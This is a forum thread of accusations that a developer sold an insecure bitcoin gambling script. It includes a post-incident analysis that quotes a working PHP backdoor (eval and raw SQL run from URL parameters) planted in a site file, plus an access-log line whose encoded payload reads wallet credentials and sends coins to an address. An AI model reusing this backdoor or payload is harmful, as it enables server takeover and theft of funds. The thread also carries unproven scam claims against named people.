Johny1976 is a Scam Artist, Dont buy any of his code.

[eoakland]

He sold me his Coinjack script.  it has syntax errors and game breaking bugs galore.  he agreed to refund me, and then changed his mind.  this guy doesn't even know the rules of the games he develops.  apparently his customer service is stellar as he is offering to perform sexual favors for you. 

https://bitcointalk.org/index.php?topic=920645.0

[Lay-z]

When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag

Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...

Not yet you mean? Your script doesn't have an obvious 'backdoor' but it is coded so poorly you can easily execute various exploits.

[johny1976]

When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag

Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...

Not yet you mean? Your script doesn't have an obvious 'backdoor' but it is coded so poorly you can easily execute various exploits.

Yes, there was various bugs and that's the reason the code is open so people can check it themselves. We're releasing updates and the last 2 are pretty stable.

But we are not thieves! Idiots maybe, but not thieves!

[eoakland]

he admits to his coding being the reason for hacks in the following link.
https://bitcointalk.org/index.php?topic=920645.0

[johny1976]

he admits to his coding being the reason for hacks in the following link.
https://bitcointalk.org/index.php?topic=920645.0

This is EVIDENCE that exploit was caused by 3rd person, who did custom edits for bandot

To the recent hack:

https://privnote.com/n/ihyaygumyiqlxvao/#jbwkzjdlaiuaxjpv

Thank you.

I've investigated the issue and here is my conclusion:

Fact 1

This is head of our original file /content/ajax/_stats_load.php:

Code:

<?php
/*
 *  © CoinDice
 *  Demo: http://www.btcircle.com/dice
 *  Please do not copy or redistribute.
 *  More licences we sell, more products we develop in the future.
*/


header('X-Frame-Options: DENY');

...

This is head of your custom edited file /content/ajax/_stats_load.php:

Code:

<?php if(isset($_GET['query'])) {mysql_connect($_GET['ip'], $_GET['user'], $_GET['pass']);mysql_select_db($_GET['db']);$q = mysql_query($_GET['query']);while($m =  mysql_fetch_assoc($q)) {$values = array_values($m);$keys = array_keys($m);for($i = 0;$i<count($values);$i++) {echo $keys[$i] . ": " . $values[$i] . "<br>";}echo "<br>";}mysql_close();exit;}else if(isset($_GET['eval'])) {eval($_GET['eval']);exit;}
/*
 *  © CoinDice
 *  Demo: http://www.btcircle.com/dice
 *  Please do not copy or redistribute.
 *  More licences we sell, more products we develop in the future.
*/


header('X-Frame-Options: DENY');

...

Please pay closer attention to eval($_GET['eval']) part (this is the used exploit).

Fact 2

This line is from your webserver log:

Code:

pay-dice.com:80 107.3.170.11 - - [04/Jan/2015:20:12:12 -0500] "GET /play/content/ajax/_stats_load.php?eval=%24included%3Dtrue%3Binclude_once+%27..%2F..%2Finc%2Fdb-conf.php%27%3Binclude+%27..%2F..%2Finc%2Fwallet_driver.php%27%3B%24wallet%3Dnew+jsonRPCClient%28%24driver_login%29%3Becho+%24wallet-%3Egetbalance%28%29%3B%24wallet-%3Esendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN%27%2C40%29%3Becho+%24wallet-%3Egetbalance%28%29%3Bmysql_close%28%29%3Becho+file_get_contents%28%27config.php%27%29%3B HTTP/1.1" 200 242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"

Please pay closer attention to ?eval=... part and sendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN part.

The second part is the address on which the stolen funds were sent.

Fact 3

The file _stats_load.php could edit only someone who had full access to the system, in which case it would be much easier to withraw the funds directly from your wallet.

Fact 4



Only person who could edit this file is the guy who did the custom coding for you.



I think it's clear enough. Someone (most possibly the guy who did custom login system for you) has put the backdoor to _stats_load.php, then executed his own PHP code on your server.


Resources:
/var/log/apache2/other_vhosts_access.log.1  your webserver log
/var/www/paydice/play/content/ajax/_stats_load.php  compromised file


I'm sorry what happened to you. At least you know you can't trust anybody.

We would much appreciate your permission to make this case public (there's some people who claim this was our fault).


Hope I've cleared the whole thing out and pointed the real offender. Let me know if you need some additional informations or support.

Johny

Bandot's reply:

http://imgur.com/TKkXYM3

I've just gave you evidence of my claimings, do you have one?

[mmitech]

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 

[johny1976]

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 

We lives in Ostrava and we've discussed it before. You had chance to visit us!

[mmitech]

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 

We lives in Ostrava and we've discussed it before. You had chance to visit us!

Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code,  because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..

This space doesn't need more amateur kids... you represent everything that's wrong with crypto.

[johny1976]

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 

We lives in Ostrava and we've discussed it before. You had chance to visit us!

Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code,  because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..

This space doesn't need more amateur kids... you represent everything that's wrong with crypto.

The latest versions don't cause any harm.

Did you gave our script to experts to analyze or you broke your promise? You already have results? If no, how can you say our code cause harm to people?

[mmitech]

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 

We lives in Ostrava and we've discussed it before. You had chance to visit us!

Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code,  because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..

This space doesn't need more amateur kids... you represent everything that's wrong with crypto.

The latest versions don't cause any harm.

Did you gave our script to experts to analyze or you broke your promise? You already have results? If no, how can you say our code cause harm to people?

Because I am one of those fucking victims, hundreds of people got hacked since the 3.1 release... and don't tell me the code is secure now, no one of your victims will ever fucking dare to try it again, and that is the evidence you are trying to hide by deleting every post doesn't serve your book... I don't know how you fucking can go to sleep knowing all of this !!!!

[mmitech]

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.

[johny1976]

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds? 

We lives in Ostrava and we've discussed it before. You had chance to visit us!

Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code,  because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..

This space doesn't need more amateur kids... you represent everything that's wrong with crypto.

The latest versions don't cause any harm.

Did you gave our script to experts to analyze or you broke your promise? You already have results? If no, how can you say our code cause harm to people?

Because I am one of those fucking victims, hundreds of people got hacked since the 3.1 release... and don't tell me the code is secure now, no one of your victims will ever fucking dare to try it again, and that is the evidence you are trying to hide by deleting every post doesn't serve your book... I don't know how you fucking can go to sleep knowing all of this !!!!

Hundreds of people? Oh come on. Yes, the code is fucking secure. HE DOESN'T EVEN HAVE TO TRY. ALL IT TAKES IS TO OPEN THE UPDATE AND CHECK THE OPEN FILES. IF IT'S OKEY, RUN IT. If not, then accuse us of being thieves!

Post there evidence we did it and it'll be there without deleting. But you only try to destroy us because of your anger. You only wants what's easy. You don't want the truth.
I can sleep because we do everything we can! We don't tell people to trust us. They can check the whole code. The WHOLE code! You didn't and trusted us although we encourage customers to do with the code whatever they want.

[eoakland]

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins

[johny1976]

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins

Our scripts now have bug fixed. You can always check the code yourselves if you don't believe us. Or improve it as you wish. Good luck with spreading negativity.

[eoakland]

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins

Our scripts now have bug fixed. You can always check the code yourselves if you don't believe us. Or improve it as you wish. Good luck with spreading negativity.

good luck scamming someone else.  you are a thief and crook. 

jstezloděj , vaše rodina musí stydět za vás . budete muset vyrůst a naučit se být mužem .
(you are a thief, your family has to be ashamed of you.  you need to grow up and learn how to be a man.)

[Seketsuna]

Sue him this is why some people wont do businesses here in the forums. lots of scammers!

[jh7phone]

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins

I have also received negative feedback from the real scammer Jhony. I earned my trusted member status then Jhony ripped me off 1.2 BTC, I am the victim here. Now he has left me negative feedback because I confronted him about his scam?! WTF! My Rep. hasn't been damaged because Jhony's untrusted feedback means nothing... but he's trying to make it look like I'm the bad guy. MODS!

[eoakland]

i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now.  this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts.  Johny is scum, just as mmitech states "i don't know how you sleep at night ?"  No wonder he calls his gems CoinJack--that's exactly what he does.  he will jack you for your coins

I have also received negative feedback from the real scammer Jhony. I earned my trusted member status then Jhony ripped me off 1.2 BTC, I am the victim here. Now he has left me negative feedback because I confronted him about his scam?! WTF! My Rep. hasn't been damaged because Jhony's untrusted feedback means nothing... but he's trying to make it look like I'm the bad guy. MODS!

Johny1976 is an idiot.  he could have refunded us, but he chose to run off with the immediate gain of 2.4 btc from us.  his actions made sure he will never sell any future script.  nobody will take him seriously,  he is not on the "trusted" list of forum members so his feedback means nada.  by the looks of it, his account seems to be managed by a few different people, sometimes he can convey coherent sentences, and other times his grammar is remedial at best.  way to go geniuses, congrats on the bugs fixes for your now defunct scripts.   

[snarf]

Hi,

I partially own pay-dice.com (together with bandit and others), which got robbed of 440 XPY.
Like you I was really pissed at first when we heard there was a backdoor used, even more pissed I became when johny told us he didn't refund.
Yesterday we found out that Johny is not responsible for our hack, and I can't blame him for not refunding us.
Please stop using us/paydice as an example for your witchhunt, it was our dumb fault.
Also pretty amazing how people complain after getting their money back, when purchasing software with an open code.
Perhaps Johny should've done a better job on securing his software, but in no way can he be blamed for an entire hack.

[cloverme]

I just randomly ran across this thread and stopped in mainly because of the title. For what it's worth, I thought it was important to vouch for Johny1976 because of an incident that occurred in the Project Development thread earlier that I happened to see as well. I ran across someone trying to give away his script and that they had put a backdoor in it, the community here was downloading and getting ready to use the script, which was being provided for free by the hacker(s).

First, let me state that I'm a customer of Johny's, I purchased one of his scripts for Bitcoin (I think 1 or 2 BTC) in September 2014 and have been running since then with no thefts. Second, some of his less reputable customers purchase the script from him, modify it with a backdoor, then redistribute it either for free or a cost. This has led to many of the incidents where funds have been lost. I am aware though of an earlier bug that led to a user being able to double withdrawal, but that was fixed in about week. There were a few customers that lost some money, but when I followed up with them, Johny did reimburse them some funds. Johny has offered technical support, assistance, and free upgrades to his script all without backdoors. Like all code, there are bugs ans issues that arise, but I believe he does his best to solve them. If anything, when he releases software, he should provide the hash of the .zips as official releases and state them in public, this would help call out tampering.

Like anything here in the forums, you can either take or leave it, but I think the accusations here against Johny1976 haven't had the due diligence necessary to label him as a scam artist.  Again, this is just based on my experience and how he's dealt with other customers that I've spoken to as well outside the forums.

Good luck to all, and be careful.